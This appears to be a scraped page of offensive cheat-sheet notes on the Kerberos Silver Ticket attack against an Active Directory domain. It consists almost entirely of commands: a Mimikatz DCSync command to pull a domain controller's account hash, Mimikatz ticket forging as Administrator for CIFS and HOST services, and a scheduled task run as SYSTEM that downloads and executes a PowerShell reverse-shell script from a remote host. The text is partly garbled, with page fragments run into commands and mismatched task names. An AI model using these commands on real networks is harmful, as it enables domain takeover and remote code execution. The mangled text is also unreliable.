Silver Ticket

Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\dc-01$"'Command Execution using Silver Ticket
Last updated

Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\dc-01$"'Last updated
whoami /all (of a domain user)Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1- 5-
21-yyyyyyyy-zzzzzzzzzz-xxxxxx /target:enterprise-dc.cyberwarfare.corp /service:cifs /rc4:<HASH> /id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-
5-21-xxxxxx-yyyy-zzzzz /target:exterprise-dc.cyberwarfare.corp /service:HOST /rc4:xxxxx /id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'schtasks /create /S enterprise-dc.cyberwarfare.corp /SC Weekly /RU "NT Authority\SYSTEM" /TN “lateral" /TR
"powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.1:8000/InvokePowerShellTcp.ps1''')'"schtasks /Run /S enterprise-dc.cyberwarfare.corp /TN "STCheck"